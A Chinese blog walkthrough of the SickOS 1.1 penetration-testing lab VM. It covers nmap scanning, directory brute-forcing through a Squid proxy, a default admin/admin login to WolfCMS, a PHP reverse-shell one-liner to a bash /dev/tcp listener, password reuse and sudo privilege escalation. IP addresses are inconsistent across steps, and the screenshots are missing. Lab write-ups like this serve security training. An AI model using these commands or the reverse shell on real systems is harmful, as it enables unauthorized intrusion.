【学渗透靶机——sickOS1.1】

环境搭建

攻击机: kali
靶机:sickOS1.1

信息收集

服务器信息收集:

主机ip发现

nmap -sn 192.168.241.0/24

扫描结果如下:
在这里插入图片描述
服务器ip为:192.168.241.150

扫描主机开放的端口

nmap --min-rate 10000 -p- 192.168.241.150

在这里插入图片描述

扫描主机开放的端口详细信息

nmap -sT -sV -O -p22,3128,8080  192.168.241.150

在这里插入图片描述

nmap进行漏洞探测

 nmap --script=vuln -p22,3128,8080 192.168.241.150

在这里插入图片描述

总结:

从服务器信息收集看 这台靶机的ip为192.168.241.150 ,服务器开放了22,3128、8080
使用nmap扫描漏洞也么什么发现,。对于开放的端口我们优先8080和3128

web 信息收集

从主机探测到的服务看8080 是web 服务,而squid-http 是个代理,

访问http://192.168.47.157:3128, 页面爆出squid及其版本号3.1.19, 通过搜索引擎得知, squid是一个代理服务器和Web缓存服务器, 主要用于Unix一类系统使用
使用dirsearch对代理服务器http://192.168.47.157:3128进行爆破, 没有结果
在这里插入图片描述
既然192.168.47.157:3128是一个代理服务器, 那就尝试用它来作为目录爆破工具的代理参数来对http://192.168.47.157进行扫描, 扫描结果如下图所示
在这里插入图片描述
发现robots.txt 访问查看:
在这里插入图片描述
很幸运发现wolfcms目录,访问查看,发现类似博客的 既然是博客网站, 那么肯定有编辑文章的接口, 通常要使用此接口需要网站管理员权限, 那么接下来就要找到网站的后台地址,而且页面中发现是wolfcms 版本为0.8.2
在这里插入图片描述

kali 使用searchploit搜索wolfcms 框架
在这里插入图片描述

下载读取改文件
在这里插入图片描述
尝试访问成功如下图:
在这里插入图片描述
通过搜素引擎搜索wolfcms 后台管理登陆的默认账号密码
在这里插入图片描述

尝试访问失败、试试弱口令admin admin 登录成功

在这里插入图片描述
访问页面查看发现home[page、articles、RSS Feed、footer等都是可写的php 页面,直接反弹shell
``

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.241.140/443 0>&1'") ?>

``
写入,保存,监听,访问,一气呵成。获得shell。
在这里插入图片描述

提权:

通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码
在这里插入图片描述
登录到mysql,并没有发什么有用的信息。那这个密码还有没有其他的用处呢。这里看一下系统有哪些用户。
发现/etc/passwd 文件可以读取,,通过这是账号和发现的密码匹配进行爆破

在这里插入图片描述
爆破成功 登录sickos ,发现可以通过sudo 提权

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值